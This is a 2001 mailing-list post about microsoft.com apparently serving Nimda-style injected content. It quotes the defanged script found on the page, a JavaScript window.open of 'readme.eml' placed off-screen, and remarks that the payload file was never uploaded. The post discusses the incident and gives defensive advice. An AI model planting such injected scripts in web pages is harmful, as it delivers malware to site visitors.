Security Incidents mailing list archives

RE: Please tell me I'm wrong: microsoft.com infected

From: "David LeBlanc" <dleblanc () microsoft com>
Date: Wed, 19 Sep 2001 20:07:15 -0700

-----Original Message-----
From: Michael H. Warfield [mailto:mhw () wittsend com]

      Yes, indeedie do.  Just did a wget
http://www.microsoft.com/frontpage
and here is what's on da
bottom:

[html][script language="JavaScript"]window.open("readme.eml",
null, "resizable=no,top=6000,left=6000")[/script][/html]

      Defanged by turning angle brackets into square brackets
even though it's not in an html attachment.  ;-)

Though you might notice that the readme.eml never made it to the web
site, so it won't actually get anyone - just good for stirring people
up.

Lesson here is that you not only have to make sure your servers are
patched, but you might want to quickly check content that other
propogate to you before you make it live 8-)